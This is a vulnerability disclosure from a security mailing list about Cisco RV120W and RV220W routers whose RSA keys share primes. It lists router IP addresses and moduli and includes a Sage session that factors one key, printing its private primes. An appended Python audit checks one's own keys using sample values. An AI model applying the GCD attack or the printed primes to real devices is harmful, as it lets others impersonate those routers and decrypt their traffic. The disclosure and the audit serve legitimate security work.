Full Disclosure mailing list archives
Cisco RVxxxW wireless routers weak RSA key generation
From: Sławek Rozbicki <slawek () rozbicki eu>
Date: Tue, 8 Jan 2013 10:57:11 +0100
During the 83/8 subnet x509 research I've noticed that some of the Cisco RVxxxW devices share the same primes in RSA moduli. It is possible to regenerate the private key with ease using fast GCD (Euclid-based) operations on public key pairs. The Issuer field contains information about the device type: Cisco RV120W & RV220W.

---
83.3.225.142
/CN=2C542D391481/OU=RV220W/O=Cisco Systems, Inc./C=US
/CN=2C542D391481/OU=RV220W/O=Cisco Systems, Inc./C=US
modulus1=DDE9C65105E787B41BCDE525321ABEE6023351DB29FF1482705FE5E817EA2B64E86FC88C33405F2B64CB505058258508C29C42A26310E37D17816C55272A3DF7356A2184D56C39ED44BD95F6CD2028EB53B19D9CA55D90258690C7382347D81594B4475EAA680E03AC006982FE5F9CD8A76FE3A0145B99B6F3F8AB6A1EFAA891
---
83.31.223.35
/CN=30E4DB8C6009/OU=RV220W/O=Cisco Systems, Inc./C=US
/CN=30E4DB8C6009/OU=RV220W/O=Cisco Systems, Inc./C=US
modulus2=CB7520F6FECFD1D3D2AAB8B71AA56CEDA9041DE130EE857C1BC1C1E289E1DDF6DC4CFF2289F3510F6671281CC2AD4DEE4FA69808E9C73D56724F8BF6CF0419C3D386F042CAD4223A52F8F2B05AA47029135A74FD1356F1248B61F5F630FFA8BCAF7896FFC4777AFB795899FE29E298B66E59253D8255CD4F4C77E5F0DF1CF15D
---
83.64.13.157
/CN=5475D083EDBF/OU=RV120W/O=Cisco Systems, Inc./C=US
/CN=5475D083EDBF/OU=RV120W/O=Cisco Systems, Inc./C=US
modulus3=E84014187A1732FDCCDD093DC5C2493DE0B4039C0B2FB0E9BB1C18BE6AE13DF5FF1D2CEED3DF193619CA155FA2DFBCFE60D0FD5DA4BE0DC11F760F4E36569AA8A4AE48293E7C02B42FDA94FD9C864A30449B2FB203503E3F91BF1608FB94B71BE57ED130FC5328F0C7ADED7A78F805493AC5F05C3063F11B11DA5793F12FDDD5
---
83.115.0.102
/CN=E05FB90C8337/OU=RV220W/O=Cisco Systems, Inc./C=US
/CN=E05FB90C8337/OU=RV220W/O=Cisco Systems, Inc./C=US
modulus4=B6A8683C4904F42909C6C0EDB62CC23AA303254F1BB212FD0B027635B701D48502C872919E057D00BA13DD761D5B85AAADC3F71B592EA6FBDB597B12062964E9C0008EF3C877E1CF42FA46B934A378E532563184F5DD85B82722753C67FC4686C7ACE38A299163E7E46C3CCD351F60F77058F8A4C130C5E1971D82CD69470137
---
83.183.190.88
/CN=70CA9B9A2FB9/OU=RV220W/O=Cisco Systems, Inc./C=US
/CN=70CA9B9A2FB9/OU=RV220W/O=Cisco Systems, Inc./C=US
modulus5=E5DFFAD88132440471963BCD892F8F07CD81C59DDC48FB5EBA9DB81210C363186A71B6BC8DC4D2831E89164A186F32112E3D83D246D8F1F9BCB38FD68A9C5CDD90EE252B8E3E49C9A3DE1B94F623C617DDAE4F88C6EB357AB93DEE2A6A1DFE54789A05CFFCE238C60A517E8396A8AFFD049FA7AC49A74C113F8F2B8E916B749B
---
83.240.76.18
/CN=5475D083F18F/OU=RV120W/O=Cisco Systems, Inc./C=US
/CN=5475D083F18F/OU=RV120W/O=Cisco Systems, Inc./C=US
modulus6=D46F6539E22616F723B19CA0C5CF5D50C3261AE9E745DAA9E5E6FE97B32835BFAEE5521698859D780FBE0D5359C59C7D50ECBE225B6A3A54B8DAACF3ACD0E6D73870529976CA3381EB5C662AA906995D6B7B30E517F7A823418A0CC9EC5CD58FD29998918D1C1583E966A9E7949F6D39DBC6CA7DF26F9EC31AF9781882BA1FAD
---

Sage example:

sage: shared_prime = gcd(int(modulus1, 16), int(modulus5, 16))
sage: p1 = shared_prime
sage: q1 = int(modulus1, 16) / p1
sage: p1, q1, p1*q1
(12499192433944213781964942843618609822425039145052853332296250924623852881553214592304077608523545660277486701486836494007466150831257304740197719090109033,
 12467424348726819445887790699943735854402415241791247762494630183745045172659286153011191677004819818143512535707572760398177810526302338217312935436896233,
 155832736090378128697871091112590904224554126152705026739669505216228645581087337554005500084035733074584019224807541210146848049519545937176568098670490593360508034088835934717657399028135252803788838857215199111453506414008787541666251986330567501515332545894446368462679367017260653321704576902679076972689)

--
Slawomir Rozbicki
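Added example, not part of the original post: the pairwise gcd from the Sage session, generalised into an audit that checks every RSA modulus in an inventory of your own devices' certificates against all the others, including the case where both primes of one key turn up in other keys. The function names and the sample fleet are constructed for illustration, with Mersenne primes standing in for RSA primes.

```python
from math import gcd, prod

def shared_prime_audit(moduli):
    """Map device name -> (p, q) for each modulus sharing a prime with another."""
    product = prod(set(moduli.values()))       # each distinct modulus once
    findings = {}
    for name, n in moduli.items():
        # gcd of n with the product of all other moduli exposes a shared factor
        g = gcd(n, (product // n) % n)
        if g == n:
            # Both primes occur in other keys: fall back to pairwise GCDs
            g = next((h for m in moduli.values() if m != n
                      for h in [gcd(n, m)] if 1 < h < n), n)
        if 1 < g < n:
            findings[name] = tuple(sorted((g, n // g)))
    return findings

def duplicate_moduli(moduli):
    """Identical moduli mean an identical key pair; GCD cannot split these."""
    groups = {}
    for name, n in moduli.items():
        groups.setdefault(n, []).append(name)
    return [names for names in groups.values() if len(names) > 1]

# Constructed sample: Mersenne primes stand in for RSA primes (not real keys)
P61, P89, P107, P127, P521, P607 = (2**e - 1 for e in (61, 89, 107, 127, 521, 607))
FLEET = {
    "dev-a": P61 * P89,    # shares P61 with dev-b and P89 with dev-d
    "dev-b": P61 * P107,
    "dev-c": P521 * P607,  # no shared prime
    "dev-d": P89 * P127,
    "dev-e": P521 * P607,  # same modulus as dev-c
}

if __name__ == "__main__":
    for name, (p, q) in shared_prime_audit(FLEET).items():
        print(f"{name}: factored, p has {p.bit_length()} bits -> regenerate key")
    for names in duplicate_moduli(FLEET):
        print("identical modulus:", ", ".join(names))
```

Any device reported by either function needs a fresh key pair generated from a properly seeded random source; reissuing the certificate over the same key does not help.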